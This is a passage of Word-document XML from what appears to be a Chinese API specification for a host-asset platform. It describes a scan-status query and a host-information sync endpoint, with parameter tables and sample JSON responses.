          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3423CDFD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="265C48D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D6288D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08277C51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DD8E05A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CA22EF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="主机信息查询状态扫描"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:t>主机信息查询状态扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F07B38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询主机信息的扫描状态；具体请求方式参照 3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B3E3BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="主机信息同步接口"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:t>主机信息同步接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1834C60B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于把外部的主机信息，同步到主机表中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9E5B8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452B1BF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/host/hostInfoSync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DCDA94"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552"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="7079"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="47E9287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0BA1F4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F4FCE5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63AD06F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FF07C9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="153A317C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56C23545" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73828250" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70CE26A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FACDA29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机Ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5E122A01" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74892CAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D83BF64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52523160" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="363D05BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="62BE2CB1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E25C59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>assetLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BFDC96D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5225479E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B395D53" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产等级（普通资产，重要资产，核心资产）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="522F65CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34C55FBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>chargeName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12F69C8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19E053E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DFF3209" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>负责人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D3A72F6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F613DD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>chargeEmail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="508E4F2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E8044BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19DA0D3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>负责人邮箱</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="626610F4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2659421A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostLocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4949A727" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="299E567D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A68D2A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>机房位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="75057478" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00A55B01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>assetNumber</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62A0DA3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FE0CAFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DD87B77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>固定资产编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="34E9E888" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D5223B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03302023" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="684D824E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="008CCEE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2DD36A21" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C8A6BDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35590D69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34644A9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="068EC2CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0D73F825" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="229B52AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BBEF759" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2823DA47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="027995C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>导入的基准（１：hostname为基准， ２：hostIp为基准），只能是１或者２</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35200807" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="350358CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C723AD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="254719F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33BB57B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统类型（１：liunx , 2:windows）, 只能是１或者２</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0392D93F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28E0CF82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53857555" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F3262E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="280C868F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>账号唯一标识</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33A4E954" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58981222" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "code": 200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "message": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "data": "success"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC7B4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果osType或type错误返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D12B706" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  "code": 100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "message": "osType/type　error",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "data": ”fail“</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320445A9"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073"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="3564"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="51BD615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8F12E1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07835147" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53D1C77D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31DEF72E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="40D89DC2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="694C71AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34B17AE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17C491DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B1C89A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，成功200， 失败100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="454A870E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51290533" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DB95AAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AD8A74B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2496B92C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>失败原因描述，code=200时，为null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63068A16" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="572BF528" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C68EDE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
